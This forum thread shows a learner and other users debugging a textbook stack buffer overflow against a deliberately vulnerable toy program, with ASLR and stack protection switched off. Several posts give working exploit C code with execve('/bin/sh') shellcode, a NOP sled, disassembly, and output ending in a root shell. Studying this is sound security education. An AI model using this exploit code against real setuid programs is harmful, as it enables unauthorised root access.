Results 1 to 10 of 11
Hi, folks,
I was trying to learn what a stack-based buffer overflow is… so I read the book, find the example, code it, but it doesn’t work. My Ubuntu keep ...
- 05-25-2011 #1Just Joined!
- Join Date
- May 2011
- Posts
- 6
buffer overflow problem - help !
Hi, folks,
I was trying to learn what a stack-based buffer overflow is… so I read the book, find the example, code it, but it doesn’t work. My Ubuntu keep showing message like “Segmentation fault”
I learned about there are 2 buffer overflow prevention schemes I must turn them off so I can get my program to run, so for those procedures I did were:
Procedure 0: turn off the random memory address scheme by entering command
#echo 0 > /proc/sys/kernel/randomize_va_space
Procedure 1: compile the vulnerable program “vuln.c” with command
$gcc -fno-stack-protector -o vuln vuln.c
Source code of vuln.c:
#include <stdlib.h>
#include <string.h>
int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]);
return 0;
}
Procedure 2:compile the exploit program,”exploit.c”, which is going to exploit the vuln
$gcc –o exploit exploit.c
Source code of exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16 \x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\ x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\ x6e\x2f\x73"
"\x68";
unsigned long sp(void){ asm("movl %esp, %eax");}
int main(int argc, char *argv[])
{
int i,offset;
unsigned int esp, ret, *addr_ptr;
char *buffer, *ptr;
offset=0;
esp=sp();
ret=esp-offset;
printf("Stack pointer (ESP : 0x%x\n",esp);
printf(" Offset from ESP : 0x%x\n",offset);
printf("Desired Return Address : 0x%x\n",ret);
buffer=malloc(600);
ptr=buffer;
addr_ptr=(unsigned int *)ptr;
for(i=0;i<600;i+=4)
{
*(addr_ptr++)=ret;
}
for(i=0;i<200;i++)
{
buffer[i]='\x90';
}
ptr=buffer+200;
for(i=0;i<strlen(shellcode);i++)
{
*(ptr++)=shellcode[i];
}
buffer[600-1]=0;
execl("./vuln","vuln",buffer,(char *)NULL);
free(buffer);
return 0;
}
Procedure 3 : Run the exploit, it supposed to show me that I got the root privilege since vuln belongs to root, but this part keep showing message “segmentation fault” Please advise me what I should do to make this program successfully demonstrate buffer overflow. Thanks !
.
- 05-26-2011 #2Just Joined!
- Join Date
- May 2011
- Posts
- 6
seems no body knows ... alright...thanks anyway . . .
- 05-28-2011 #3Linux Guru
- Join Date
- Apr 2009
- Location
- I can be found either 40 miles west of Chicago, or in a galaxy far, far away.
- Posts
- 8,975
It depends upon how the code was compiled, and what compiler you are using. Some options will trap this sort of exploit now and generate a segfault like you got. Also, what's next in the stack after the offending buffer will determine what happens. Sorry, but I don't have time for an in-depth analysis of your code - I assume it is "cookbook" code that you copied?
Sometimes, real fast is almost as good as real time.
Just remember, Semper Gumbi - always be flexible!
- 05-28-2011 #4Just Joined!
- Join Date
- May 2011
- Posts
- 6
what do you mean "cookbook " ?
- 05-30-2011 #5Just Joined!
- Join Date
- May 2011
- Posts
- 6
for now I learned there are 3 schemes prevents the stack based buffer overflow...
1 gcc compiler
2 linux kernel
3 CPU with NX bit
I hope this can save somebody's time in the future ...
- 06-01-2011 #6Just Joined!
- Join Date
- May 2009
- Posts
- 1
Hello shanwu, Rubberman,
shanwu :
Did you try it on DVL (Damn Vulnerable Linux) ?
Where did you find this piece of code ?
Best regards,
- 06-01-2011 #7Just Joined!
- Join Date
- Oct 2007
- Posts
- 15
I've been too trying to learn how to exploit stack-based buffer overflow. The code you gave don't seem to work for me either, but here are some of the steps I used to debug your code.
Check the shellcode
The shell code seems fine to me. How about some real debugging !Code:#python -c 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\xC8"' > code # ndisasm code 00000000 31C0 xor ax,ax 00000002 B046 mov al,0x46 00000004 31DB xor bx,bx 00000006 31C9 xor cx,cx 00000008 CD80 int 0x80 0000000A EB16 jmp short 0x22 0000000C 5B pop bx 0000000D 31C0 xor ax,ax 0000000F 884307 mov [bp+di+0x7],al 00000012 895B08 mov [bp+di+0x8],bx 00000015 89430C mov [bp+di+0xc],ax 00000018 B00B mov al,0xb 0000001A 8D4B08 lea cx,[bp+di+0x8] 0000001D 8D530C lea dx,[bp+di+0xc] 00000020 CD80 int 0x80 00000022 E8E5FF call word 0xa 00000025 FF db 0xff 00000026 FF2F jmp word far [bx] 00000028 62696E bound bp,[bx+di+0x6e] 0000002B 2F das 0000002C 73C8 jnc 0xfff6 0000002E 0A db 0x0a
Instead of using theI preferCode:#echo 0 > /proc/sys/kernel/randomize_va_space
To debug the code, you have to activate core dump:Code:setarch 'uname -m' -R /bin/bash
Then after running you code, you'ill get this messageCode:ulimit -c unlimited
You can check that ASLR is deactivated by checking the ESP pointer is always the same.Code:# ./exploit Stack pointer (ESP : 0xbffff4f8 Offset from ESP : 0x0 Desired Return Address : 0xbffff4f8 Segmentation fault (core dumped)
Then you can debug your assembly code by lunching gdbI'm still trying to figure out the problem, I'll post more info later on.Code:gdb -q exploit core
Greets
- 06-01-2011 #8Just Joined!
- Join Date
- Oct 2007
- Posts
- 15
Here is the working exploit and here are some explanations:
I'v added some code to write your buffer to file, here are the disassmbly of the buffer:Code:#include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; unsigned long sp(void){ asm("movl %esp, %eax");} int main(int argc, char *argv[]) { int i,offset; unsigned int esp, ret, *addr_ptr; char *buffer, *ptr; FILE *file; offset=50; esp=sp(); ret=esp+offset; printf("Stack pointer (ESP : 0x%x\n",esp); printf(" Offset from ESP : 0x%x\n",offset); printf("Desired Return Address : 0x%x\n",ret); buffer=malloc(600); ptr=buffer; addr_ptr=(unsigned int *)ptr; for(i=0;i<600;i+=4) { *(addr_ptr++)=ret; } for(i=0;i<200;i++) { buffer[i]='\x90'; } ptr=buffer+200; for(i=0;i<strlen(shellcode);i++) { *(ptr++)=shellcode[i]; } buffer[600-1]=0; file = fopen("buffer.bin","ab+"); fprintf(file,"%s",buffer); execl("./vuln","vuln",buffer,(char *)NULL); free(buffer); return 0; }
The first part of the buffer is NOP instructions, if I'm not mistaken, it is a technique called heap spraying used to introduce your shellcode which you can see at the following adress 000000C8.Code:00000000 90 nop 00000001 90 nop 00000002 90 nop 00000003 90 nop 00000004 90 nop 00000005 90 nop 00000006 90 nop 00000007 90 nop 00000008 90 nop 00000009 90 nop 0000000A 90 nop 0000000B 90 nop 0000000C 90 nop 0000000D 90 nop 0000000E 90 nop 0000000F 90 nop 00000010 90 nop 00000011 90 nop ... 000000C6 90 nop 000000C7 90 nop 000000C8 31C0 xor ax,ax 000000CA B046 mov al,0x46 000000CC 31DB xor bx,bx 000000CE 31C9 xor cx,cx 000000D0 CD80 int 0x80 000000D2 EB16 jmp short 0xea 000000D4 5B pop bx 000000D5 31C0 xor ax,ax 000000D7 884307 mov [bp+di+0x7],al 000000DA 895B08 mov [bp+di+0x8],bx 000000DD 89430C mov [bp+di+0xc],ax 000000E0 B00B mov al,0xb 000000E2 8D4B08 lea cx,[bp+di+0x8] 000000E5 8D530C lea dx,[bp+di+0xc] 000000E8 CD80 int 0x80 000000EA E8E5FF call word 0xd2 000000ED FF db 0xff 000000EE FF2F jmp word far [bx] 000000F0 62696E bound bp,[bx+di+0x6e] 000000F3 2F das 000000F4 7368 jnc 0x15e 000000F6 E1BF loope 0xb7 000000F8 98 cbw 000000F9 DA db 0xda 000000FA E1BF loope 0xbb 000000FC 98 cbw 000000FD DA db 0xda 000000FE E1BF loope 0xbf 00000100 98 cbw 00000101 DA db 0xda 00000102 E1BF loope 0xc3 ... 000006D1 BFF8F4 mov di,0xf4f8 000006D4 FF db 0xff 000006D5 BFF8F4 mov di,0xf4f8 000006D8 FF db 0xff 000006D9 BFF8F4 mov di,0xf4f8 000006DC FF db 0xff 000006DD BFF8F4 mov di,0xf4f8 000006E0 FF db 0xff 000006E1 BFF8F4 mov di,0xf4f8 000006E4 FF db 0xff 000006E5 BFF8F4 mov di,0xf4f8 000006E8 FF db 0xff 000006E9 BFF8F4 mov di,0xf4f8 000006EC FF db 0xff 000006ED BFF8F4 mov di,0xf4f8 000006F0 FF db 0xff 000006F1 BFF8F4 mov di,0xf4f8 000006F4 FF db 0xff 000006F5 BFF8F4 mov di,0xf4f8 000006F8 FF db 0xff 000006F9 BFF8F4 mov di,0xf4f8 000006FC FF db 0xff 000006FD BFF8F4 mov di,0xf4f8 00000700 FF db 0xff 00000701 BFF8F4 mov di,0xf4f8 00000704 FF db 0xff
The last part of your buffer is the adress where point your buffer, you have so many so that you can overwrite the return adress on the stack.
The buffer adress was miscalculated, as it points to 4 instructions before your buffer, you can verify it in gdb
so all you have to do is to change the buffer adress (ret variable) by setting the offest to -50 or to 50 and changing the minus sign to a plus sign.Code:x/10i <eip adress>
and voilà !
Code:# ./exploit Stack pointer (ESP : 0xbffff4f8 Offset from ESP : 0x32 Desired Return Address : 0xbffff52a sh-4.1#
- 06-01-2011 #9Linux Guru
- Join Date
- Apr 2009
- Location
- I can be found either 40 miles west of Chicago, or in a galaxy far, far away.
- Posts
- 8,975
I think that the lesson here is that application developers need to guard against buffer overflows with rigor. Back in 1989, I was assigned the job as first formal software QA manager for the startup I was working for. Buffer overflows were the main target of my team's work, and boy did we find a lot of them! The result? A rigorous testing methodology as well as inviolate rules of software development to avoid such stuff. The software is used in major manufacturing sites world wide, including the manufacturing lines used for F117 stealth fighter avionics.
Sometimes, real fast is almost as good as real time.
Just remember, Semper Gumbi - always be flexible!
- 06-02-2011 #10Just Joined!
- Join Date
- May 2011
- Posts
- 6
Mr. chevalier3as,
Originally Posted by chevalier3as 
I have following questions....
1. Why can't I disable ASLR by command:
#echo 0 > /proc/sys/kernel/randomize_va_space
I switched to root and enter above command, and ESP is still changing every time I execute ./exploit.
2. I am running ubuntu 10.10, i686, when I use setarch, it shows "unrecognized architecture" , what should I do to fix this problem so I can disable ASLR ?
3. How many buffer overflow schemes have you turned off before you successfully ran your exploit program?
4. How do you gdb the memory arrangement inside array variable "Buffer " ?
Thank you for your patience,
Reply With Quote 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts